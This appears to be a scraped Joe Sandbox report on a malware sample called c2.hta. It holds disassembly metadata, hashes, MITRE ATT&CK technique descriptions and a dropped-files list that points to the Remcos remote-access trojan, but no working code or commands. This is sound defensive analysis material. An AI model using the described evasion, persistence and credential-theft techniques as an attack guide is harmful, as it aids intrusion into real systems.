Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 0543e48c60746b9c32113194fd27a104be4ef68d481864b77e80f355e5ba6a9d
Instruction ID: a08a82fe08e6e8a0d67d53656a2bd36b3267533bdfceffd11af290fba1b498fe
Opcode Fuzzy Hash: 0543e48c60746b9c32113194fd27a104be4ef68d481864b77e80f355e5ba6a9d
Instruction Fuzzy Hash: DFD022393C53107BF228B330AC0FFCA3B10BB02B00F104834730AAA0C0C8E06840C644

Function 00C42DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C42DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C42DDB

Part of subcall function 00C1F292: Sleep.KERNEL32 ref: 00C1F30A

Strings

Shell_TrayWnd, xrefs: 00C42DC1

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: adfa78e842c8f98a01dd3f00f24bc306c788620fe0e3c87df2909915e36bbb96
Instruction ID: aee62bf9e4a644d697a0db94c24940e070f7338d8284bbd34b682617b5cbcaa9
Opcode Fuzzy Hash: adfa78e842c8f98a01dd3f00f24bc306c788620fe0e3c87df2909915e36bbb96
Instruction Fuzzy Hash: DCD02239388310B7E228B330AC0FFDA3B10BF02B00F104834730AAA0C0C8E06840C640

Function 00BEC17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00BEC213
GetLastError.KERNEL32 ref: 00BEC221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BEC27C

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 762be53858cdb3cc86e2141357b4ab9a9fc659b6c10f0bda7fbbea58cfce9b36
Instruction ID: ca271a770fdac7c6845b092dc6536d3f672fa28b9b25990f944c4d88d8d0cdb6
Opcode Fuzzy Hash: 762be53858cdb3cc86e2141357b4ab9a9fc659b6c10f0bda7fbbea58cfce9b36
Instruction Fuzzy Hash: 9F41B631604286AFDB219FE6C844BAE7FE5EF11710F2441E9FA59972A1DB308D02C760

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report c2.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\21088d3e-c563-4f23-9eba-fb19f8c8df6c.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250107052308Z-173.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Windows Analysis Report
c2.hta

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre